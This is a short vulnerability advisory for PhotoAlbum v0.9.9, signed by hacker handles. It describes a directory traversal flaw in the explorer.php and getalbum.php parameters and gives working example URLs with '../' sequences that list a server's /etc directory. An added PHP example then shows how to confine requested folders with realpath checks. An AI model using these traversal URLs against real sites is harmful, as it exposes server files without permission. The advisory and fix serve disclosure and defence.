Exploit:

Affected program: PhotoAlbum v 0.9.9

Any user can pass a directory in the request to the script; the script will read that directory and output all the files in it that it has read access to.

For instance:

http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/

Synnergy Networks
==============================
http://www.synnergy.net

For versions older than 0.9.9:

http://www.siteaffected.com/phpPhotoAlbum/getalbum.php?album=../../../etc/

will show the /etc directory.

--------------------------------------------------------
ThE MaDj0kEr (KPK)
--------------------------------------------------------
mad@j0ker.net | http://www.j0ker.net
--------------------------------------------------------
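
A mitigation for the traversal described above, as an added example that is not part of the original advisory or of phpPhotoAlbum's own code: the requested folder is canonicalised and confined to the album root before any directory is listed. The function name, the album root and the sample inputs are assumptions constructed for the illustration.

```php
<?php
// Added example. resolve_album_folder() and the demo root are hypothetical
// names; they stand in for whatever explorer.php / getalbum.php do with the
// "folder" / "album" request parameter.

function resolve_album_folder(string $root, string $requested): ?string
{
    // NUL bytes never belong in a path (PHP 8 filesystem calls throw on them).
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    if ($rootReal === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks, and returns false
    // when the resulting path does not exist.
    $target = realpath($rootReal . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // The canonical path must be the root itself or sit below it. The
    // trailing separator stops "/albums" from matching "/albums-private".
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $rootReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demo: a throwaway album root with one sub-folder.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'album_demo_' . getmypid();
mkdir($root . DIRECTORY_SEPARATOR . 'holiday', 0700, true);

// Constructed inputs: two legitimate values, the advisory's traversal
// string, and a traversal hidden behind a valid folder name.
$samples = ['holiday', '.', '../../../../../../../etc/', 'holiday/../../'];
foreach ($samples as $folder) {
    $resolved = resolve_album_folder($root, $folder);
    printf("%-28s => %s\n", $folder, $resolved === null ? 'rejected' : 'allowed');
}

rmdir($root . DIRECTORY_SEPARATOR . 'holiday');
rmdir($root);
```

Only the path returned by the function should be handed to the directory-listing code; the raw request value should never reach it.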